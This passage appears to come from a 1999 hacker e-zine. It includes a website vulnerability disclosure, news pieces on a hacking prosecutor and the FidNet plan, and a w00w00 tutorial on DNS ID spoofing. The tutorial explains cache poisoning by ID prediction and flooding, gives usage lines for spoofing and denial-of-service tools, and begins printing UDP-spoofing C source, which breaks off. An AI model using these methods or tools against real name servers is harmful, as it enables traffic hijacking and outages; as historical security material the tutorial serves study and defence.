Consequently, it was possible for attackers, from anywhere on the Internet, to compromise these systems in a number of ways, e.g.

1) Denial of Service attacks (both Post Office and Scottish Executive)

2) Compromise of confidential e-commerce information, including names, addresses and credit card details of the Post Office on-line stamps & envelopes customers

3) Compromise of confidential telegrams from friends and families of our military forces in the Balkans sent to BFPO-Kosovo (Post Office)

4) Damage to the trustworthiness of the ViaCode digital certification authority brand name (Post Office). Would you buy Digital Certificates or encryption services from a ViaCode which, since its launch in March, cannot seem to get its own webserver and instead uses the Royal Mail server with a rival South African Thawte digital certificate, rather than a ViaCode one ?

5) Issuance of fake Press releases from the official Scottish Executive website resulting in political embarrassment (re-shuffle the Scottish Cabinet ? ) and/or stock market manipulation ("leak" of Scottish Budget details ?)

6) Installation of Trojan horse remote control software such as netbus, to take complete control of these webservers, possibly using them as a springboard for further InfoWar attacks on the UK internet infrastructure and other back office or internal systems within the Royal Mail or the Scottish Executive.

Both the web sites were warned about the planned DNS Conference announcement, with 48 hours warning by email to their webmasters, followed up by special delivery "snail mail" to their top management. To date, only the Royal Mail has responded by fixing the blatant security holes, and publishing a Security Statement on their website http://www.royalmail.co.uk/ISS.htm The "process and technology to secure such systems and data" have obviously failed. Serbian hackers, for example, are unlikely to be deterred by threats of civil proceedings.
The senior management of the Royal Mail seems to think that "Microsoft patches have been applied to the website over the last year although some have been omitted where they are not required for our configuration." Last Thursday 12th August is technically "over the last year" but the wwww.royalmail.co.uk systems have been vulnerable for months, so perhaps the senior management are not getting the full picture from their subordinates. "An external organisation has been contracted to test security on our website ("penetration testing")." Presumably this external organisation has only just been hired, as it is inconceivable that a reputable one would have missed the vulnerabilities mentioned above. The Scottish Executive seems to have ignored both the email and "snail mail" warnings, and their website still remains vulnerable. We strongly suggest that any news reports or press releases published on the Scottish Executive website should be independently verified via email, fax or phone. We thank you for your attention. For further details, contact us by encrypted email: infowar@dnscon.org or infowar@hushmail.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.0.2i iQA/AwUBN7kFuYOnRwzqxHsCEQLGgQCgxdAAfk lsMt0cnLBQGh3kReSDAFsAoK1mTvtbQRhDQqb3 JXQNDO0C7Dss=QgcM -----END PGP SIGNATURE----- @HWA 31.0 Mitnick Prosecutor Moving to Private Practice ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ted After successfully prosecuting Kevin Poulsen, Ron Austin, Justin Petersen, Lewis DePayne and Kevin Mitnick, the federal prosecutor David Schindler will be moving on to private practice. While none of his cyber crime cases actually went to trial he did manage to get guilty pleas from all of them. LA Times http://www.latimes.com/HOME/BUSINESS/CUTTING/lat_schindler990816.htm Online Crime Fighter Signs Off David Schindler Is Leaving U.S. Attorney's Office for Private Practice.
By GREG MILLER, Times Staff Writer Kevin Mitnick wasn't the only prominent figure in the computer hacking world closing out a major phase of his career last week. David Schindler, one of Mitnick's prosecutors, was also making something of a curtain call. Mitnick was sentenced to 46 months in prison and ordered to pay $4,125 to the companies he victimized. After the hearing, Schindler said he is leaving the U.S. attorney's office after a 10-year stint during which he won convictions of a list of defendants that reads like a hacking hall of fame. Besides Mitnick, Schindler also prosecuted Kevin Poulsen, Ron Austin, Justin Petersen and Lewis DePayne--more hackers than any other federal prosecutor has faced. Along the way, Schindler played a leading role in a number of major white-collar crime cases, most notably winning a conviction of former Arizona Gov. Fife Symington on bank fraud charges in 1997. "I've had just a fabulous run in this office," Schindler said. "I've been fortunate to have the greatest mix of cases I could ever have imagined." Nevertheless, Schindler is leaving in October for a position as a partner in the law firm Latham & Watkins, where he will be part of the firm's vast intellectual property team and where his salary will easily exceed the $115,000 a year he earned as a federal prosecutor. During his years as an assistant U.S. attorney in Los Angeles, Schindler built a reputation as an unflappable litigator--circumspect, forthright and respected by even his adversaries. "He is an exceptionally talented prosecutor," said Richard Sherman, who represented DePayne and, for a short while, Mitnick. "In the Symington case, he was fighting a well-financed political giant, and he acquitted himself admirably." There was a recent setback in the Symington case. A federal appeals court overturned the conviction, ruling that the judge in the case improperly dismissed one of the jurors. Schindler said the government has asked the appeals court to reconsider.
At 37, Schindler is about the same age as the hackers he prosecuted, and though he may not relish the thought, he has a few things in common with them. Like most, he is a native Southern Californian, unusually disciplined in his craft and with a head for the complexities of computer crime. But unlike many hackers, Schindler was never particularly interested in technology, was fairly popular in school and came from a stable family. His father, now deceased, was a courtroom translator. His mother is an executive with a music publishing company. Schindler earned a degree in psychology from UC Berkeley, a law degree at UCLA and joined the U.S. attorney's office in 1989. Over the course of the next few years, Southern California became a hotbed of hacking crimes, and Schindler handled the high-profile cases. None of the cases ever went to trial. But he extracted guilty pleas from Poulsen and Austin, who had rigged radio station call-in contests to win a pair of Porsches; Petersen, who once illegally wired $150,000 from a bank; Mitnick, who swiped source code from giant technology companies; and DePayne, Mitnick's longtime accomplice. With those cases behind him now, Schindler offered his thoughts on those defendants. Poulsen "really generates the most complicated feelings for me," Schindler said. "He was probably the brightest, and he had the ability to create more harm. But I'm proud of him and the way he's turned his life around." After serving his five-year sentence, Poulsen has established a budding career in journalism, writing stories for Wired magazine and columns for ZDNet.com. Austin was "an unfortunate follower," Schindler said. "I don't think I've ever seen anybody as frightened as he was when he was arrested. It was clear he was not cut out for a life of crime." Austin now works at a computer store in West Los Angeles. Petersen, a flamboyant hacker known for schmoozing minor celebrities and porn stars, was behind some of Schindler's more embarrassing moments.
Petersen engaged in illegal hacking even while working as a government informant. When Schindler confronted Petersen about this at the federal courthouse, Petersen ducked out of their meeting, ran down the courthouse steps and became a fugitive. "What a piece of work," Schindler said. "I don't think I've ever met a person in my life who has had so many aborted attempts at walking the straight and narrow, someone whose own arrogance has caused him to self-destruct so many times." For his part, Petersen's occasional comments about Schindler are mostly unprintable. Petersen was recently released after a probation violation, and is now reportedly trying to start an Internet porn company. Schindler seems to have the most contempt for Mitnick. He is a "strange, in some senses pathetic, misguided human being," Schindler said. "I don't hold a lot of confidence that he will turn his life around." Of course, Mitnick would probably not be complimentary toward Schindler either. The notoriously obsessive hacker, who is still in jail, has long believed that he has been treated unfairly, and has even accused the government of tampering with witnesses, a charge Schindler vehemently denies. Surprisingly, other hackers have a fairly charitable view of Schindler, who is married and has a 1-year-old daughter. "He was a very tough prosecutor," Austin said. "But looking at it in retrospect, I think he was fair. When you compare him to everybody else out there, he's head and shoulders above the rest." Poulsen too holds Schindler in relatively high regard. In contrast to other prosecutors, Schindler "charged [me] with crimes I actually committed," Poulsen said. "It was refreshing. I'm not crazy about prosecutors, but what more can you ask for?" In his new job, Schindler will be handling trade secret thefts and other work involving large companies. But he admits he may also be called upon to do criminal work, meaning he could be defending the kinds of people he once prosecuted. 
"Could I be defending a Mitnick?" he asked, anticipating the direction of the interview. "I won't be in that position. Most hackers aren't able to afford private practice [defense attorneys]." Times staff writer Greg Miller can be reached at greg.miller@latimes.com. Copyright Los Angeles Times @HWA 32.0 NIPC Head Talks About FidNet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Richard Clarke, the National Coordinator for Security, Infrastructure Protection and Counterterrorism, says that the recent hysteria over the proposed FIDNet is unwarranted. The proposal calls for the GSA to control the IDS network and not the FBI as previously thought. He said that once lawmakers actually read the proposal and understand how it works opposition will fade away. NY Times - registration required http://www.nytimes.com/library/tech/99/08/biztech/articles/16monitor.html August 16, 1999 Author of Computer Surveillance Plan Tries to Ease Fears By TIM WEINER ASHINGTON -- Congress has blocked money for a planned system to safeguard government computers, a prominent Republican has denounced the system as "Orwellian" and some civil libertarians are calling it a potential threat. But the plan's author, a senior National Security Council official, says those are only temporary setbacks to a critically needed system that will be built if President Clinton wants it. The proposed system, called Fidnet, is intended to protect government computers from hackers, whether they be precocious teen-agers or potential terrorists, administration officials say. It represents "the first attempt by any nation to develop a plan to defend its cyberspace," a draft plan by the security council says. The White House is seeking $1.5 billion in new spending for the program. Although Fidnet has been in the works for more than a year, many in Congress learned about it on July 28, when The New York Times published details of the draft proposal. The reaction was swift. 
Two days later, the House Appropriations Committee deleted $2 million in start-up money requested by the FBI to develop the system. Then the House majority leader, Rep. Dick Armey, R-Texas, denounced Fidnet, saying it raised "the Orwellian possibility that unscrupulous government bureaucrats could one day use such a system to read our personal e-mail." But the principal author of the plan, Richard Clarke, the National Security Council's counterterrorism czar, said Congress would assuredly finance the system once lawmakers understood it and Clinton gave it the go-ahead. "If the president approves Fidnet, there'll be funding for it," he said in an interview. Clarke, whose formal title is National Coordinator for Security, Infrastructure Protection and Counterterrorism, has been warning for years about the threat of an "electronic Pearl Harbor" in the form of an attack on government computers. He said that a cyberspace assault would be "as bad as being attacked by bombs," and that "an attack on American cyberspace is an attack on the United States" that should trigger a military response. These fears led last year to a new initiative, called Presidential Decision Directive 63. Fidnet is one of the first major computer-security programs to grow out of the directive. It would cover civilian agencies, like the State Department and the IRS, and would be modeled on and linked to an existing Pentagon security system. Ultimately, the plan calls for private companies to create security links to the government's systems. Clarke acknowledged that no one in Congress had been briefed on Fidnet, which has not yet been given a go-ahead by President Clinton, and that the draft plan had raised questions among civil libertarians who say it has a potential power to monitor innocent citizens. But he said Congress and the system's critics had the wrong idea about the planned surveillance network. 
The critics among the civil libertarians question the FBI's role in the computer monitoring scheme. The bureau already has a centralized security operation called the National Infrastructure Protection Center, based in its headquarters, that has received technical support from the National Security Agency, the intelligence service that eavesdrops on the rest of the world, and from the CIA. The New York Times reported that the Fidnet system, too, would be overseen by the FBI. Clarke's draft plan calls for the National Infrastructure Protection Center to play a role in analyzing and responding to any signs of intrusion. But Clarke said in the interview that while some funds requested for Fidnet were earmarked for the Justice Department and the bureau, the system "would not be run by the FBI." Instead, he said, it would be established by the General Services Administration, an independent agency better known for furnishing government offices than for law enforcement. "It would not be monitoring privately owned and operated systems, only government computers," Clarke said. "And it would not violate people's privacy rights." He conceded that failing to brief Congress was a mistake. Because Congress already has a system to detect unauthorized intrusions into its information systems, it should realize that "all that Fidnet would be would be the same kind of thing for sensitive government computers," Clarke said. "Congress has concerns about Justice being the funding source to pay for intrusion detection mechanisms," he said. "That's a legitimate concern. When they get the briefing they'll see there's a requirement to have something like Fidnet." @HWA 33.0 Spoofing revisited (w00w00) ~~~~~~~~~~~~~~~~~~~~~~~~~~~ DNS ID Hacking -------------- Brought to you by: Raw-Powa and w00w00 Security Development (WSD) --[1]-- DNS ID Hacking Presentation w00w00! Hi. You might be wondering what DNS ID Hacking (or Spoofing) is. 
DNS ID Hacking isn't the usual way of hacking/spoofing (such as jizz or any-erect). This method is based on a vulnerability in the DNS protocol itself, so it affects several DNS implementations (including WinNT's DNS and BIND, for example).

--[1.1]-- DNS Protocol Mechanism

For the first step, you will need to know how the DNS works. We will only explain the most important parts of this protocol. In order to do that, we will follow the steps of a DNS request packet from A to Z!

1: The client (bla.bibi.com) sends a request to resolve the name "www.heike.com". To resolve the name, bla.bibi.com uses "ns.bibi.com" as its DNS server. Let's take a look at the following diagram:

  /----------------------------------\
  | 111.1.2.123 = bla.bibi.com       |
  | 111.1.2.222 = ns.bibi.com        |
  | format:                          |
  | IP_ADDR:PORT->IP_ADDR:PORT       |
  | ex:                              |
  | 111.1.2.123:2999->111.1.2.222:53 |
  \----------------------------------/

  ...
  gethostbyname("www.heike.com");
  ...

  [bla.bibi.com]                                  [ns.bibi.com]
  111.1.2.123:1999 --->[?www.heike.com]------> 111.1.2.222:53

Here we see our name resolution request leaving from source port 1999, asking the DNS server on port 53 to resolve the name. [note: DNS servers always listen on port 53]

Now that ns.bibi.com has received the resolution request from bla.bibi.com, ns.bibi.com will have to resolve the name; let's look at it...

  [ns.bibi.com]                                       [ns.internic.net]
  111.1.2.222:53 -------->[dns?www.heike.com]----> 198.41.0.4:53

ns.bibi.com asks ns.internic.net, which is a root name server, for the address of www.heike.com; if it doesn't have it, it refers ns.bibi.com to a name server which has authority over '.com' domains.

>>> it can have the NS record for heike.com, and not the A/CNAME for
>>> www.heike.com (this is the normal case). Also, you're not asking
>>> ns.internic.net, you're asking one of the root servers for
>>> COM directly.
[note: We ask internic first because it may already have the answer in its cache]

  [ns.internic.net]                                           [ns.bibi.com]
  198.41.0.4:53 ------>[ns for .com is 144.44.44.4]------> 111.1.2.222:53

Here we can see that ns.internic.net answered ns.bibi.com (which is the NS that has authority over the domain bibi.com) with the name server of for.com (which is the authority over '.com' domains), which has the IP address 144.44.44.4 [let's call it ns.for.com].

Now our ns.bibi.com will ask ns.for.com for the address of www.heike.com, but this one doesn't have it either, so it refers the request to the DNS of heike.com, which has authority over heike.com, as shown here:

  [ns.bibi.com]                                  [ns.for.com]
  111.1.2.222:53 ------>[?www.heike.com]-----> 144.44.44.4:53

The answer from ns.for.com is:

  [ns.for.com]                                              [ns.bibi.com]
  144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4]---> 111.1.2.222:53

Now that we know which IP address has authority on the domain "heike.com" [we'll call it ns.heike.com], we ask it what the IP address of the machine www (www.heike.com) is:

  [ns.bibi.com]                                 [ns.heike.com]
  111.1.2.222:53 ----->[?www.heike.com]----> 31.33.7.4:53

And now, at last, we have our answer:

  [ns.heike.com]                                            [ns.bibi.com]
  31.33.7.4:53 ------->[www.heike.com == 31.33.7.44] ----> 111.1.2.222:53

We can now forward it to our client bla.bibi.com:

  [ns.bibi.com]                                             [bla.bibi.com]
  111.1.2.222:53 ------->[www.heike.com == 31.33.7.44]----> 111.1.2.123:1999

Now bla.bibi.com knows the IP address of www.heike.com :)

So.. now let's imagine the opposite; that we'd like to have the name of a machine from its IP address. In order to do that, the way to proceed will be a little different because the IP address will have to be transformed:

Example: 100.20.40.3 will become 3.40.20.100.in-addr.arpa

Attention!!
This method is only for the IP resolution request (reverse DNS).

So let's look at a practical example, taking the IP of www.heike.com (31.33.7.44, or "44.7.33.31.in-addr.arpa" after the translation into a format the DNS understands).

  ...
  gethostbyaddr("31.33.7.44");
  ...

We send our request to ns.bibi.com (our name server):

  [bla.bibi.com]                                            [ns.bibi.com]
  111.1.2.123:2600 ----->[?44.7.33.31.in-addr.arpa]-----> 111.1.2.222:53

ns.bibi.com sends the request for the name of the machine that is 44.7.33.31.in-addr.arpa to ns.internic.net:

  [ns.bibi.com]                                            [ns.internic.net]
  111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 198.41.0.4:53

ns.internic.net will send the IP address of a name server which has authority on '31.in-addr.arpa':

  [ns.internic.net]                                                   [ns.bibi.com]
  198.41.0.4:53 --> [NS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53

Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4:

  [ns.bibi.com]                                            [ns.for.com]
  111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53

And so on... In fact the mechanism is almost identical to the one used for name resolution. I hope you understood the dialog on how DNS works. Now let's study the DNS message format.

--[1.2]-- DNS packet

Here is the format of a DNS message:

  +---------------------------+---------------------------+
  | ID (the famous :)         | flags                     |
  +---------------------------+---------------------------+
  | number of questions       | number of answers         |
  +---------------------------+---------------------------+
  | number of RR authority    | number of supplementary RR|
  +---------------------------+---------------------------+
  |                                                       |
  \                       QUESTION                        \
  |                                                       |
  +-------------------------------------------------------+
  |                                                       |
  \                        ANSWER                         \
  |                                                       |
  +-------------------------------------------------------+
  |                                                       |
  \                 Stuff etc.. No matter                 \
  |                                                       |
  +-------------------------------------------------------+

--[1.3]-- Structure of DNS packets.
__ID__

The ID identifies each DNS packet: exchanges between name servers are from port 53 to port 53, and a server receives more than one
>>> not necessarily; DNS is allowed to bind any client port, and the
>>> DNS ID is also needed for asynchronous client resolvers (which
>>> might need to make more than one simultaneous query)
request at a time, so the ID is the only way to tell the different DNS requests apart. We'll talk about it a little more later..

__flags__

The flags area is divided into several parts:

             4 bits                    3 bits (always 0)
               |                             |
  [ QR | opcode | AA | TC | RD | RA | zero | rcode ]
     |            |    |    |    |             |
     |            |____|____|____|             |______ 4 bits
     |               1 bit each
     |_ 1 bit

QR = If the QR bit is 0, it means that the packet is a question, otherwise it's an answer.

opcode = 0 for a standard query, 1 for an inverse query, and 2 for a server status request (we don't need to know all these modes).

AA = If it is equal to 1, it says that the name server's answer is authoritative.

TC = Truncation flag, set to 1 when the message was cut short. This is unimportant for us.

RD = If this flag is 1, it means "Recursion Desired"; for example, when bla.bibi.com asks ns.bibi.com to resolve the name, this flag tells the DNS server to handle the whole resolution itself.

RA = If this is set to 1, it means that recursion is available. This bit is set to 1 in the answer of the name server if it supports recursion.

Zero = Here are three zeroes...

rcode = It contains the error code returned for the DNS request. 0 means "no error", 3 means "name error" (the name does not exist).

The 2 following flags don't have any importance to us.

DNS QUESTION:

Here is the format of a DNS question:

  +-----------------------------------------------------------------------+
  |                         name of the question                          |
  +-----------------------------------------------------------------------+
  |        type of question        |            type of query             |
  +--------------------------------+--------------------------------------+

The structure of the name is like this. Example: www.heike.com is

  [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]

The encoding is the same for the in-addr.arpa name of an IP address.
This splits www.heike.com into three parts: "www", "heike", and "com". The number in front of each part gives its length, and the whole name is terminated by a 0.

44.33.88.123.in-addr.arpa would be:

    [2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]

[note]: a compression format exists (a name can be replaced by a pointer to an earlier copy of it in the same packet), but we won't use it.

type of question:

Here are the values that we will use most of the time:

[note]: There are more than 20 different type values(!) and I'm fed up with writing :))

    name   value
    A    |   1  |  IP Address (for resolving a name to an IP)
    PTR  |  12  |  Pointer (for resolving an IP to a name)

type of query:

This 16-bit field is in fact the query class, not a second type: it's 1 for Internet data (the same "class" value as in the answer RR below). See RFCs 1033-1035 and 1037 for the full list of types and classes.

DNS ANSWER:

The answers have a format that we call RR (resource record). Here is the format of an answer (an RR):

    +------------------------------------------------------------------------+
    |                           name of the domain                           |
    +------------------------------------------------------------------------+
    |               type               |               class                 |
    +----------------------------------+-------------------------------------+
    |                          TTL (time to live)                            |
    +------------------------------------------------------------------------+
    |      resource data length        |                                     |
    |----------------------------------+                                     |
    |                           resource data                                |
    +------------------------------------------------------------------------+

name of the domain: The domain name is stored in the same way as in the question of the resolution request for www.heike.com. The "name of the domain" field will contain: [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].

type: The type field takes the same values as "type of question" in the question part of the packet (1 = A, 12 = PTR).

class: The class field is equal to 1 for Internet data.

time to live: This 32-bit field gives, in seconds, how long the information may live in the name server's cache.

resource data length: The length of the resource data; for example if resource data length is 4, the resource data is 4 bytes long.
resource data: Here we put the IP, for example (at least in our case).

As an example, this is what happens when ns.bibi.com asks ns.heike.com for www.heike.com's address:

    ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53

    +---------------------------------+--------------------------------------+
    |           ID = 1999             |   QR = 0   opcode = 0   RD = 1       |
    +---------------------------------+--------------------------------------+
    | number of questions = htons(1)  |   number of answers = 0              |
    +---------------------------------+--------------------------------------+
    | number of RR authoritative = 0  |   number of supplementary RR = 0     |
    +---------------------------------+--------------------------------------+
    +------------------------------------------------------------------------+
    |         name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]         |
    +------------------------------------------------------------------------+
    |   type of question = htons(1)   |   type of query = htons(1)           |
    +---------------------------------+--------------------------------------+

Now let's look at the answer from ns.heike.com:

    ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53

    +---------------------------------+---------------------------------------+
    |           ID = 1999             |   QR=1 opcode=0 RD=1 AA=1 RA=1        |
    +---------------------------------+---------------------------------------+
    | number of questions = htons(1)  |   number of answers = htons(1)        |
    +---------------------------------+---------------------------------------+
    | number of RR authoritative = 0  |   number of supplementary RR = 0      |
    +---------------------------------+---------------------------------------+
    +-------------------------------------------------------------------------+
    |         name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]          |
    +-------------------------------------------------------------------------+
    |   type of question = htons(1)   |   type of query = htons(1)            |
    +-------------------------------------------------------------------------+
    +-------------------------------------------------------------------------+
    |         name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]            |
    +-------------------------------------------------------------------------+
    |       type = htons(1)           |   class = htons(1)                    |
    +-------------------------------------------------------------------------+
    |                        time to live = 999999                            |
    +-------------------------------------------------------------------------+
    | resource data length = htons(4) | resource data = inet_addr("31.33.7.44")|
    +-------------------------------------------------------------------------+

Yah! That's all for now :))

Here is an analysis of the answer:

    QR = 1 because it's an answer :)
    AA = 1 because the name server has authority over its domain
    RA = 1 because recursion is available

I hope you understood that, because you will need it for what follows.

--[2.0]-- DNS ID hack/spoof

Now it's time to clearly explain what DNS ID hacking/spoofing is. As we explained before, the only way for the DNS to match answers to questions is the ID field in the packet. Look at this example:

    ns.bibi.com:53 ----->[?www.heike.com] ------> ns.heike.com:53

So you only have to spoof the IP of ns.heike.com and send your false answer before the real one from ns.heike.com arrives!

    ns.bibi.com <------- . . . . . . . . . . . . . . ns.heike.com
         |
         |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com

But in practice you have to guess the right ID. If you are on a LAN, you can sniff to get this ID and answer before the name server does (it's easy on a local network :). If you want to do this remotely you don't have a lot of choices, but you do have 4 basic methods:

1.) Randomly test all the possible values of the ID field. You must answer before the NS (ns.heike.com in this example)! This method is obsolete unless you already know the ID or have some other condition in your favour for predicting it.

>>> This method is not obsolete --- it's how real attacks work.
>>> It takes less than a minute on a DS1 to exhaustively search all the
>>> IDs, and if you flood (or crash) the authority servers for the
>>> resource record you're trying to inject, you have all the time in the
>>> world to do it. This is the problem that the current DNS protocol
>>> can't fix.

2.) Send some DNS requests (200 or 300) in order to increase the chances of hitting the right ID.

>>> This is analogous to using 200 or 300 responses (both consume ID
>>> space), except that naive DNS servers might not detect 300 queries,
>>> even if they do detect 300 wrong answers.

3.) Flood the DNS so that it cannot do its work. The name server will crash and log the following error:

    >> Oct 06 05:18:12 w00w00 named[1913]: db_free: DB_F_ACTIVE set - ABORT

At this point named is out of order :)

4.) Or you can use the vulnerability in BIND discovered by SNI (Secure Networks, Inc.) together with ID prediction (we will discuss this in a bit).

##################### Windows ID Vulnerability ###########################

I haven't tested this on WinNT, but Windows IDs are extremely easy to predict because the ID is '1' by default, and '2' for the second question (if there are 2 questions at the same time).

######################## BIND Vulnerability ##############################

There is a vulnerability in BIND (discovered by SNI as stated earlier) that we will be using.

>>> we didn't discover this; it's old news. We released an advisory on
>>> how much easier it is to exploit than the old papers let on.

In fact, DNS IDs are easily predictable; you only have to sniff one exchange with a DNS server in order to do what you want. Let me explain... The name server picks a random ID to start with, but then only increments it by one for each following question. It's easy to exploit this. Here is the way:

1. Be able to sniff the messages that arrive at some name server you control or can watch (ns.dede.com for this sample).

2.
You ask NS.victim.com to resolve (something).dede.com, and NS.victim.com will ask ns.dede.com to resolve it:

    ns.victim.com ---> [?.dede.com ID = 444] ---> ns.dede.com

3. Now we have the ID of the message from NS.victim.com, so you know which ID range you'll have to use (ID = 444 in this sample).

4. You then make your resolution request, e.g. for www.microsoft.com, to NS.victim.com:

    (you) ---> [?www.microsoft.com] ---> ns.victim.com
    ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com

5. Flood the name server ns.victim.com with spoofed answers (source address of ns.microsoft.com), starting from the ID you already have (444) and incrementing it by one each time:

    ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com
    ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com
    ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com
    ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com
    ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com
    ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com

Now you know that DNS IDs are predictable, and that they only increase. You flood ns.victim.com with spoofed answers carrying IDs 444 and up ;)

>>> That's not true on OpenBSD (random scoreboarded IDs).

[Note: WSDspoofID does this]

There is another way to exploit this vulnerability without root on any NS. The mechanism is very simple. Here is the explanation:

We send ns.victim.com a resolution request for (random).provnet.fr:

    (you) ----------[?(random).provnet.fr] -------> ns.victim.com

Then ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr. There is nothing new here, but this is where the interesting part begins.
At this point you begin to flood ns.victim.com with spoofed answers (with ns1.provnet.fr's IP as source) carrying IDs from 100 to 110:

    (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com
    (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com
    (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com
    (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com
    ...

After that, we ask ns.victim.com (non-recursively, so it answers only from its cache) whether (random).provnet.fr has an IP address. If ns.victim.com gives us an IP address for (random).provnet.fr, then one of our spoofed answers was accepted and we have found the correct ID! Otherwise we move the window and repeat the attack until we find the ID. It's a bit long, but it's effective.

[Note: This is how WSD-IDpred works]

##########################################################################

Here you will find 5 programs:

WSDkillDNS  - very simple DNS spoofer
WSDsniffID  - sniff a LAN and reply with false DNS answers before the NS does
WSDspoofID  - a DNS ID spoofer (you'll need to be root on a NS)
WSD-IDpred  - a DNS ID predictor (no need to be root on a NS)
WSD-baddns  - a very simple denial of service attack to disable a DNS server

Note: You can find source and binaries of these programs at ftp.w00w00.org/pub/DNS. You need to install libpcap on your machine before compiling the w00w00 ID programs.

- w00w00 Security Development (WSD)
  See http://www.w00w00.org and ftp://ftp.w00w00.org/pub

Thanks to: pirus, Heike, and all of w00w00 Security Development (WSD), and Asriel.
Special Thanks to: ackboo and Secure Networks, Inc. (SNI) at www.secnet.com for finding the vulnerability.

/* I'm a w00w00ify'd w00c0w */

Here is a HOWTO on the w00w00 ID tools:

----[HOWTO]----

I've decided to make a little HOWTO because the w00w00 ID tools are not very user friendly for a beginner :)

1: WSD-baddns

WSD-baddns is a program to take a DNS server down. It's very, very simple to use !!! :)

/* I'm a w00w00ify'd w00c0w */

Usage:   WSD-baddns <name server to attack>
Example: WSD-baddns bob.lenet.fr

2: WSDsniffID

WSDsniffID is a DNS hijacker. You need to have root privileges.
It's for a LAN only :)

Usage:   WSDsniffID <interface> <ip> <name> [type 1 or 12]
         '' by type we mean 1 = TYPE A, 12 = TYPE PTR ''
Example: WSDsniffID eth0 31.3.3.7 www.i.m.mucho.horny.ya 12
         (We are hijacking a PTR)

So now if someone runs "nslookup <ip>" on the network they get:

    [root@w00w00 w0w0w]# nslookup 1.2.3.4
    Server:  localhost
    Address:  127.0.0.1

    Name:    www.i.m.mucho.horny.ya
    Address:  1.2.3.4

3: --= WSDspoofID =--

1) First you need root on a NS with AUTH over a domain (for example shok.janova.org has authority over *.janova.org).

WSDspoofID is a DNS ID predictor (but you need to have root on a NS, or at least the privileges to sniff that NS's traffic).

Usage:   WSDspoofID <interface> <victim ns> <your domain> <your ns> <type> <spoof name> <spoof ip> <trusted ns>
Example: WSDspoofID ppp0 NS2.MCI.NET janova.org shok.janova.org 12 www.i.m.ereet.ya 194.206.23.123 ns2.provnet.fr

Well, after that, when you ask NS2.MCI.NET for 194.206.23.123 you get:

    [root@w00w00 w0w0w]# nslookup 194.206.23.123 ns2.mci.net
    Server:  ns2.mci.net
    Address:  204.70.57.242

    Name:    www.i.m.ereet.ya
    Address:  194.206.23.123
    [root@w00w00 w0w0w]#

We use ns2.provnet.fr because ns2.provnet.fr has AUTH over 194.206.23.*. To find out who has AUTH over 194.206.23.*, you just need to do the following:

    [root@w00w00 w0w0w]# host -t NS 23.206.194.in-addr.arpa
    23.206.194.in-addr.arpa name server NS2.PROVNET.FR
    23.206.194.in-addr.arpa name server BOW.RAIN.FR
    23.206.194.in-addr.arpa name server NS1.PROVNET.FR
    [root@w00w00 w0w0w]#

To find out the NS which has AUTH over, for example, *.provnet.fr:

    [root@w00w00 w0w0w]# host -t NS provnet.fr
    provnet.fr name server NS1.provnet.fr
    provnet.fr name server BOW.RAIN.fr
    provnet.fr name server NS2.provnet.fr
    [root@w00w00 w0w0w]#

Note: The order of the entries can change!!! You may get NS1 first.

Here is the source of our programs...

----[ BUGS ]----

1: The bit field on Solaris causes a bus error..
We will fix it soon

----[END of BUGS ]----

----[WSD-spoof.c]----

/* ******************************************************************** */
/*               w00w00 functions for spoofing UDP                      */
/* ------------------------------------------------------------------- */
/*               w00w00 Security Development (WSD)                      */
/*               Email: WSD@w00w00.org                                  */
/*               Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************************** */

/* System headers: the zine copy lost the <...> names, so the standard ones
 * the code needs are restored here. ip.h, udp.h and dns.h are w00w00's own
 * headers (struct iphdr, struct udphdr, struct dnshdr) and are not
 * reproduced in the article. */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include "ip.h"
#include "udp.h"

#define IPHDRSIZE  sizeof(struct iphdr)
#define UDPHDRSIZE sizeof(struct udphdr)

/*****************************************************************************/
/*
 * in_cksum --
 *      Checksum routine for Internet Protocol family headers (C Version)
 */
/*****************************************************************************/
unsigned short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1) {
